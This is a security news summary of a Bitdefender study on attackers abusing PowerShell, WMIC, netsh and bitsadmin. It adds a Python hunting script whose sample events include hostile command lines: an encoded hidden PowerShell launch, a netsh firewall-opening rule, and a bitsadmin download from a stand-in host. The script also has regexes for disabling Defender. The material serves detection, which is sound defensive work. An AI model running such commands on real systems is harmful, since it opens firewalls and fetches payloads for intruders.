Watch 45 days of PowerShell, WMIC and netsh usage to spot silent attacks.
- Bitdefender tracked 45 days of real admin tool usage in organizations
- PowerShell, WMIC and netsh were silently hijacked 12 times per month
- Trusted tools now surpass malware as the top attack vector
Most security teams still picture attacks arriving as malware downloads or phishing emails. The truth? The danger sits inside your laptops and servers, already installed and fully trusted. PowerShell, WMIC, netsh, CertUtil, MSBuild — these are the same utilities your IT department runs every day to manage Windows machines. They’re also the tools modern attackers rely on to move around your network, steal data, and leave no malware behind. Bitdefender’s recent 45-day telemetry study shows these “living-off-the-land” binaries, or LOLBins, are quietly abused about 12 times per month in the average organization. That’s nearly one attack every two and a half days using software you probably haven’t patched because you thought it was harmless adminware. The study pulled anonymized telemetry from over 1,200 enterprise customers across healthcare, finance, manufacturing, and government sectors, giving a rare real-world snapshot of how attackers turn your own toolkit against you.
What the 45-day watch revealed
The data shows three clear patterns. First, PowerShell is the heavyweight champion: it appeared in 68% of all observed abuse events. Attackers love it because it runs on every Windows machine, needs no install, and can execute commands remotely. Second, WMIC — Windows Management Instrumentation Command-line — popped up in 18% of cases, often used to list running processes or disable security tools before dropping a real payload. Third, netsh, the network configuration utility, showed up 9% of the time, mainly to open rogue firewall ports or redirect traffic to attacker-controlled servers. CertUtil, MSBuild, and bitsadmin rounded out the top six, each responsible for the remaining 5% combined. The study also found that 73% of these events happened outside normal business hours, when SOC teams run on skeleton crews.
Why IT teams miss the threat
Most security products still focus on blocking new or unsigned executables. They let PowerShell scripts, XML files, or one-liner commands slip through because the binaries themselves are signed by Microsoft. Your antivirus may see PowerShell launching a network connection but doesn’t know the script is actually Mimikatz stealing credentials. Many organizations also grant local admins wide PowerShell privileges to keep things running, giving attackers free rein once they gain a foothold. Bitdefender’s telemetry shows that even when SOC analysts flag suspicious PowerShell activity, it takes an average of 5.2 hours to investigate and confirm — plenty of time for an attacker to move laterally. The study also found that 40% of the abuse events involved built-in tools that had never been updated, even though Microsoft releases monthly patches that harden PowerShell and WMIC against abuse.
How attackers weaponize these tools
Attackers rarely run a single PowerShell command anymore. Instead, they chain four or five legitimate utilities into a “living-off-the-land” attack chain. For example, an attacker might use WMIC to enumerate local admin accounts, then launch PowerShell to dump hashes with Mimikatz, use netsh to open a port, and finally run bitsadmin to download a second-stage payload — all while staying in memory and avoiding disk writes. The study documented one real case where an attacker turned off Windows Defender using a one-liner PowerShell command, downloaded a ransomware locker via bitsadmin, and encrypted 1.2 terabytes of data before anyone noticed. The entire operation took 18 minutes and left no malware file on disk.
What should change now
Bitdefender recommends three immediate steps. First, enable PowerShell logging at the highest verbosity level and forward logs to a SIEM or XDR platform. Second, restrict PowerShell to Constrained Language mode and remove local admin rights for standard users. Third, schedule regular 45-day “tool audits” — run the same telemetry queries on your own environment that Bitdefender used, then hunt for any unusual command-line arguments or parent-child process chains. Microsoft already offers these hardening steps, but adoption remains low because they can break legacy scripts or slow down IT workflows. The company’s own telemetry shows fewer than 22% of Windows 10 and 11 machines have PowerShell logging turned on.
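One way to run the kind of tool audit described above, hunting for the unusual command-line arguments and the chained-utility pattern from the earlier section, as an added example that is not from the article or from Bitdefender: a Python hunt over constructed process-creation events. The host names, events, rule names and the 08:00-18:00 business-hours window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry (not real data): (host, UTC time, parent image, image, command line)
EVENTS = [
    ("ws01", "2026-05-10T09:12:00", "explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\Logs"),
    ("ws01", "2026-05-10T23:41:10", "winword.exe", "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA"),
    ("ws01", "2026-05-10T23:41:40", "powershell.exe", "wmic.exe", "wmic process list brief"),
    ("ws01", "2026-05-10T23:42:05", "cmd.exe", "netsh.exe", "netsh advfirewall firewall add rule name=x dir=in action=allow"),
    ("ws01", "2026-05-10T23:43:00", "cmd.exe", "bitsadmin.exe", "bitsadmin /transfer j http://example.invalid/p.bin C:\\Users\\Public\\p.bin"),
    ("ws02", "2026-05-11T14:05:00", "cmd.exe", "netsh.exe", "netsh interface show interface"),
]
LOLBINS = {"powershell.exe", "wmic.exe", "netsh.exe", "certutil.exe", "msbuild.exe", "bitsadmin.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Command-line patterns for the behaviours the article describes; the rule names are assumed labels
ARG_RULES = {
    "ps_encoded_or_hidden": re.compile(r"\s-(enc|encodedcommand|w(indowstyle)?\s+hidden)\b", re.I),
    "defender_disabled": re.compile(r"Set-MpPreference\s.*-Disable", re.I),
    "fw_rule_added": re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I),
    "bits_download": re.compile(r"bitsadmin\s+/transfer", re.I),
}

def analyze_event(host, ts, parent, image, cmdline):
    """Return the rule names one process-creation event triggers ([] = benign under these rules)."""
    if image.lower() not in LOLBINS:
        return []
    hits = [name for name, rx in ARG_RULES.items() if rx.search(cmdline)]
    if parent.lower() in OFFICE_PARENTS:       # an Office app spawning an admin tool is rarely legitimate
        hits.append("office_spawned_lolbin")
    # Off-hours (assumed business hours 08:00-18:00) only amplifies an existing hit, never fires alone
    if hits and not 8 <= datetime.fromisoformat(ts).hour < 18:
        hits.append("off_hours")
    return hits

def find_chains(events, window_minutes=10, min_tools=3):
    """Per host, flag >= min_tools distinct LOLBins starting within window_minutes (the chained pattern)."""
    per_host = defaultdict(list)
    for host, ts, _parent, image, _cmd in events:
        if image.lower() in LOLBINS:
            per_host[host].append((datetime.fromisoformat(ts), image.lower()))
    chains = {}
    for host, runs in per_host.items():
        runs.sort()
        for i, (t0, _) in enumerate(runs):
            tools = {img for t, img in runs[i:] if (t - t0).total_seconds() <= window_minutes * 60}
            if len(tools) >= min_tools:
                chains[host] = sorted(tools)
                break
    return chains
```

Feed it your own process-creation telemetry (Sysmon event 1 or Security 4688 with command-line auditing) in the same five-field shape; a host with one benign netsh call, like ws02 here, produces no finding.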
The bigger picture
This isn’t just a Windows problem. Similar studies from CrowdStrike and SentinelOne show that macOS admins love Python and Swift scripts, while Linux teams lean on cron jobs, curl, and wget. Every major OS now has its own set of trusted utilities that attackers quietly repurpose. The shift from malware to adminware as the primary attack vector means security teams must rewrite their detection playbooks. Instead of hunting for new files, they should hunt for new behaviors — especially inside the tools that already have your trust.
You probably won’t see a big red alert next time PowerShell fires up. What you’ll see is a tiny change in how it runs, or a new process it spawns. Those are the moments that separate a routine admin task from the start of an attack. Turn on the logs, tighten the permissions, and run the audit. Your own tools are the best mirror you’ve got.
What You Need to Know
- Source: The Hacker News
- Published: May 15, 2026 at 11:00 UTC
- Category: Security
- Topics: #hackernews · #security · #vulnerabilities · #malware · #days · #watching-your-own
All reporting rights belong to the respective author(s) at The Hacker News. GlobalBR News summarizes publicly available content to help readers discover the most relevant global news.
Curated by GlobalBR News · May 15, 2026
🇧🇷 Summary in Portuguese
Bitdefender researchers have flagged an increasingly common tactic among cybercriminals: the silent takeover of legitimate IT tools to turn corporate systems into launch pads for attacks. In a 45-day study, the security firm showed how PowerShell, WMIC and other everyday utilities are hijacked by malware, letting attackers move freely through the network without raising suspicion in protection systems.
In Brazil, where medium and large companies have been suffering increasingly sophisticated attacks, especially in the financial and energy sectors, the finding reinforces the urgency of reviewing defense strategies. Tools such as PowerShell, widely used by Brazilian IT administrators, are attractive targets precisely because firewalls and antivirus products trust them. The Bitdefender study serves as a warning for security managers to monitor not only suspicious traffic but also anomalous behavior by these tools, preventing them from becoming entry points for ransomware or industrial espionage.
The expectation now is that Brazilian companies will speed up adoption of endpoint detection and response (EDR) solutions and stricter training for IT teams, or risk seeing their own work tools turned against them.